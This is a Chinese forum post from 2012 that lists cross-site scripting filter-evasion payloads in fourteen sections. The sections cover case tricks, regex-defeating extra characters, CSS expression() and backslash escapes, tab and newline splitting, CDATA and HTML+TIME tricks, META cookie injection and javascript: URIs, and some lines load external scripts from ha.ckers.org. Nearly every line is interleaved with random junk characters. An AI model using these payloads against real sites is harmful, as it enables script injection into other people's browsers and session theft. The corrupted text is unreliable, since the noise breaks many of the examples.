1. 改变字符大小写3 D2 S; q- ?2 D4 _, v# j# V
" ~, X A" c! X2 ^* f2 Z
: a" b% _: o4 q5 v! A
3 P% y0 ^! A' C/ e7 }" ]) I8 K
<sCript>alert(‘d’)</scRipT>2 C) ~9 P( f" h! P! O
% T7 S) m, a$ q+ D. X2. 利用多加一些其它字符来规避Regular Expression的检查
) z C0 {4 p% a) V; ~0 C! i2 p. _1 w0 E( Z q9 Z0 p
<<script>alert(‘c’)//<</script>( q3 b' j2 P6 O; k+ R8 ]+ [
4 u9 i" ]* B# C; e' V0 m6 y <SCRIPT a=">" SRC="t.js"></SCRIPT>* f y* o) ]: Z) C& @, S: o
( v, @) x' `* B: s" ?: i <SCRIPT =">" SRC="t.js"></SCRIPT>* m5 |& X, x1 M7 E2 x
: g. V+ s& ?$ k1 ]7 Z* v
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>. V2 ?, W: u. n) o1 j2 G, ?
! h4 k6 ~! E8 E [$ I2 ] <SCRIPT "a=’>’" SRC="t.js"></SCRIPT># {- A3 ]0 x1 T1 k0 e* g" [# s3 P
u/ O4 q# R8 A
<SCRIPT a=`>` SRC="t.js"></SCRIPT>& `0 y R2 j' e: E% h' t$ y; o
" y1 k: ^. S, ]% M0 C3 B <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
1 q: X' i/ p6 {! k+ t8 R: w4 h" e8 F- B4 M% }& H
3. 以其它扩展名取代.js
8 q, J* ~! n6 ]) U3 T6 Z* U; ^$ n" i5 X! F: N$ ~' } Y. t
<script src="bad.jpg"></script>
/ `: N$ g8 x1 x6 n" t9 C; ?: y- |! A; z* Y# b- X
4. 将Javascript写在CSS档里
* B) K$ n. v( n4 q' A
* `+ `% y2 u* w <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">6 ]+ y9 U7 ] Y$ G# |8 U
1 D- z5 C2 v- @5 Y t
example:, n H1 |: V+ L) Z
2 l8 R3 |8 L+ W' Q9 t+ X$ N8 e, X body {
+ f5 d, x3 }4 [% v# q( e
8 E y% `0 [) j2 n* c1 }0 c background-image: url(‘javascript:alert("XSS");’)
3 K# n" P( o) ?4 @; M9 c! u/ H" l9 T- x: ]0 x
}; u0 f" d5 l5 u3 ~- c
) u# s0 `: O# ]4 [3 K2 T1 E& t* i5. 在script的tag里加入一些其它字符2 v" Q5 f" C/ _; N
( K7 n4 S+ i5 q6 Z3 K' s: `7 r <SCRIPT/SRC="t.js"></SCRIPT>- R3 d( b- ~$ l! D' D
, f7 |) S- t% ?1 W! \, q <SCRIPT/anyword SRC="t.js"></SCRIPT>! }0 C4 m ~$ e, S$ j+ }
5 O/ y2 O0 H. @+ F9 [* m6. 使用tab或是new line来规避 Z L: a% `* B" ]7 \5 A
~: f; ~$ I$ A7 L$ [9 P
<img src="jav ascr ipt:alert(‘XSS3′)">% s) ?) i- ~& h6 f5 I
0 }% o0 [2 X2 ?4 B <img src="jav ascr ipt:alert(‘XSS3′)">6 b+ J1 H6 y( _- @5 f! ?$ j1 ^* X
/ V; K N3 Y {0 w9 k6 H <IMG SRC="jav ascript:alert(‘XSS’);">( T9 v# g/ r2 f! Q
" _% _1 C; u' u5 k% C2 F- L- M3 C" g; n
-> tag
8 E9 F/ s8 W* C7 c; B' e# H; _7 Y4 I2 T4 Q* j
-> new line& H& N" A) m. O8 X# Z% S
( n; w! S7 ~( f7 X4 U: E+ L
7. 使用"\"来规避 d' d+ E! z& Y; |" Y. Q# u1 S6 v
9 g: |" k2 O1 w" B( y
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
2 m8 M& [. _, ~2 [. c$ _, e$ k7 E5 ^/ [! g5 x( `2 z
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, o" W/ P' x. |1 a: e- U P- I
! @& h+ s9 r1 ]% l# x <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
1 S$ s1 c4 @* w8 I* H7 E) d3 b8 D, a# k8 H2 {$ n
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">! ] e; d/ t2 ~" F5 b" A
0 \6 K4 Y: ?3 X" @- i/ `
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
' X1 _% F- j* c- f* W* m; X8 ^/ x0 R3 x/ r# w
8. 使用Hex encode来规避(也可能会把";"拿掉)3 ~$ ]/ S: T6 i5 m; _% K4 c$ l
! V4 c. W4 j- p* L. n! w
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 A8 F6 Y5 a% T& Q U
6 U$ Z5 V. V# F* l, d* b* s0 H2 |7 F
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">/ W, a; T# f6 ~" C
: X: R E, f' ?. A8 g( w# _" R, K
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
) a) i! N/ R$ d3 t
: C; g. y5 C1 X; h 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">; K' f7 d& W, T! Y; M0 F
' {; I" u5 y, n# o( A7 i9. script in HTML tag
`5 \9 N, ]' \! y0 o+ a9 N* O4 O# a: X! v
<body onload=」alert(‘onload’)」>
: b- b: l s& J T/ p, r3 f7 T3 O& w" {+ U4 A; i
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
$ d# r2 c6 c6 R4 Q8 c" v1 d0 c# k# r. J9 t/ M$ M6 G" C
10. 在swf里含有xss的code
" X" Q: E- m8 s: {; p h9 y1 v; S1 S4 V; v7 [
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
* h* j7 O6 ~/ c Q2 `: q: k! p; F
11. 利用CDATA将xss的code拆开,再组合起来。2 B( V. @' s' @# Q
( [9 m* R8 ]) S$ f9 ]: w <XML ID=I><X><C>9 {3 T0 b0 _3 c) u# s; \) g
: J, O& N/ ~' g U8 P
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>( \! \' d4 ]. {0 d9 w1 N
1 `8 j! l Z1 ~7 A6 ~$ X# V7 x+ I8 |& q
</C></X>
- b# {3 E- I: b0 S! T# `
1 G# H' ]+ x8 v* f" ^ </xml>
! `1 d6 A/ U" ?7 @0 J9 E: I& Q1 s# m9 q3 a% ~
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>5 o* h; X2 E5 A6 N1 x, e l2 q
& `( N3 _* d4 V8 A1 k. e
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML> C1 ?& E. r) h+ n# X
! D+ |0 j0 C6 j+ W- h; U <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> C2 x$ R/ K: m3 b2 k
Q$ ~. p1 T' y6 K1 ~ j
12. 利用HTML+TIME。
( I p: K! z) I8 L# J: `$ d9 i
- _$ [# I5 g" _: P% T: O: n) w$ V <HTML><BODY>& V# [9 g1 @" G/ z) ~
) ]$ V0 F" S' r <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">, ~0 Z+ x* L( {
3 u% ]: N5 W7 ~& p* q8 \! a, y
<?import namespace="t" implementation="#default#time2">
8 `' k$ W9 V7 G
( z' J; O0 ~5 Z( t <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
& d, O% @. R" k; \7 O9 G$ @, H+ W, Z4 O+ K4 p6 \
</BODY></HTML>
: o& q. j5 D/ e) Z9 m# S5 Y' P8 @* }! `
13. 透过META写入Cookie。
- K( m$ S5 K4 S }( P p
# ]* b( b1 e% i5 J% a <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">$ s, F! ] L* A! o" A- @( L& |! m
, @4 A# g3 C5 O2 S. q; {
14. javascript in src , href , url
) C( q$ ?/ J- g# `, X8 T1 G6 m9 J! m/ |1 d
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
$ M! S' |: ~' u
/ M: {5 ^9 S. I: f <img src="javascript:alert(‘XSS3′)">
6 D$ X; F- h3 c$ C! H" `- H/ J- X, F% E. x# u( m( ~% y
<IMG DYNSRC="javascript:alert(‘XSS20′)">* x8 {7 K- i7 D C
& p' @" ?2 `3 g* e- W0 G. V3 z& R <IMG LOWSRC="javascript:alert(‘XSS21′)">5 k% @4 @2 |3 o5 ]. n& I) x/ T% E
7 C8 V4 v2 X/ e* T0 i
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
4 A. N2 t, U( F, G$ L& h
+ k6 J* V% L" l' S <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
7 t1 R' | N( I$ ~6 J+ B9 M4 C
4 o2 v* D- k: i% w <TABLE BACKGROUND="javascript:alert(‘XSS29′)">3 s$ ?5 R |& j6 E# E, {4 j
3 c, a0 m" D# ]4 Z; l <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
0 O( U4 }) L2 u# L( T7 r+ e4 w
3 {7 @3 s# H1 @7 V0 v, `# A& m5 t <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
) X/ y: g7 L, P4 C; s, z
! ^* a* n' |7 H' U$ p5 { </STYLE><A CLASS=XSS></A>; k. d, c( M2 B) r0 _
; S0 F0 B: F) ~# l
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
: Y7 k1 y' A/ v4 x& T1 N% M$ E% B# }
7 c0 W5 a9 w" U |
发表于 2012-12-31 09:59:28
收藏
支持
反对